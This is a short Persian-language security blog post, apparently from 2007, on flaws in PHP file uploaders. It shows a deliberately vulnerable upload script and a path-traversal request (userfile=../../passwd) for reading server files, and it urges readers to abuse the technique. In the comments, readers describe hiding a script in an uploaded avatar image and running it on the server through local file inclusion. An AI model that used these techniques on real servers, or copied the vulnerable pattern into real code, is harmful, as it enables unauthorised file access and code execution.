مقاله : جستاری در زمینه آسیب پذیری های رایج در آپلودر ها

نوشته شده در ۱:۰۶ ق.ظ – 1:06 ق.ظ | توسط شهریار.ج | 66 views

درورد
یکی نسیت به من بگه مگه بیکاری!
خب بگزریم این یک نمونه اسکریپت آپلود فایل هست!(نه بابا)

form enctype=”multipart/form-data” method=POST action=>
input type=hidden name=MAX_FILE_SIZE value=1000>
input type=hidden name=aaa value=1000>
Send this file:

input type=submit value=”Send File”>
<   ?
if(!empty($userflie))
{
copy($userflie, “./upload/$userfile_name”);
echo “

File is uploaded ./
upload/$userfile_name“;
}
?>

خب ما فرض میکنیم این فایل هارو این طوری آپ میکنه:

http://localhost/up.php?userfile=file.zzz&userfile_name=out.txt

اگه ما یک دفه این کارو کنیم چی میشه؟

http://localhost/up.php?userfile=../../passwd&userfile_name=out.txt
خب دیگه بقیش با خودتون !
شما میتونید با یکم علاقه،پشتکار،امید،زحمت،عشق،قابلمه،مرگ بر آمریکا،۲۲ بهمن، تو چقدر نازی، وردپرس و…. دیگه از این چیزی که بهتون یاد دادم نهایت سوء استفاده رو بکنید!
حالا از شوخی گذشته یکم روش فکر کنید!!!!!

مطالب مرتبط

کد مطالب مرتبط را در اینجا قرار دهید

  1. ۶ پاسخ برای “مقاله : جستاری در زمینه آسیب پذیری های رایج در آپلودر ها”

  2. توسط ata در ۲ اسفند ۱۳۸۵ | پاسخ

    salam mer30 site khobi dari +matlebesh ;)

  3. توسط unkn0wn در ۲۰ اسفند ۱۳۸۵ | پاسخ

    اسم این روش LFI(Local File Include ) هست
    در مواردی میشه php shell هم آپلود کرد با همین روش

  4. توسط unkn0wn در ۲۰ اسفند ۱۳۸۵ | پاسخ

    آپلود رو اشتباه گفتم ، اما میشه یه فایله لوکال رو ادیت کرد به یه php shell
    (نه همه جا )

  5. توسط Snake در ۲۰ اسفند ۱۳۸۵ | پاسخ

    بهتره بگیم میشخ فایل هایی که اجازه خودندنشون رو ندازیم بخونیم:d

  6. توسط unkn0wn در ۲۲ اسفند ۱۳۸۵ | پاسخ

    نه :D
    یه فروم رو در نظر بگیر که باگ LFI داره … هر کسی میتونه واسه خودش یه avator.jpg آپلود کنه !
    حالا ما این avator.jpg رو با edjpgcom ادیت کنیم و اسکریپت خودمونو توش بذاریم
    بعدش با استفاده از LFI عکس avator.jpg رو لود کنیم
    به راحتی اسکریپت ما رو سرور execute میشه …
    یه فیلم هم گرقتم از همین کار ! خواستی میزارم … ;)

  7. توسط Snake در ۲۴ اسفند ۱۳۸۵ | پاسخ

    عزیزه من این که شما میگی قضیه اش یه چیز دیگس!
    اگه خواستی فیلمرو تو نظرات بزار ، جالببود میزارم تو بلاگ  :D

ارسال دیدگاه

*
برای اینکه ثابت کنید شما یک ارسال کننده جفنگ (یک اسکریپت جفنگ نویس)
نیستید،کلمه امنیتی را که در تصویر نقش بسته است در فیلد پایین بنگارید .
قبل از ارسال به موارد زیر توجه کنید :
1- دعوت نامه پرشین گیگ نداریم.
2- از تبلیغ بپرهیزید.
3- کلمات نا مناسب و توهین آمیز به کار نبرید.
از دیدگاه شما متشکریم.

Click to hear an audio file of the anti-spam word

درباره من

در این وبلاگ ، جستار ها و دست نوشته های مرا در باره امنیت و ضد امنیت خواهید خواند.برای دسترسی به مقالات نوشته شده در وادی ضد امنیت و امنیت از دسته بندی {مقالات} استفاده کنید.


نامه برقي اينجانب
یافتن مطالب :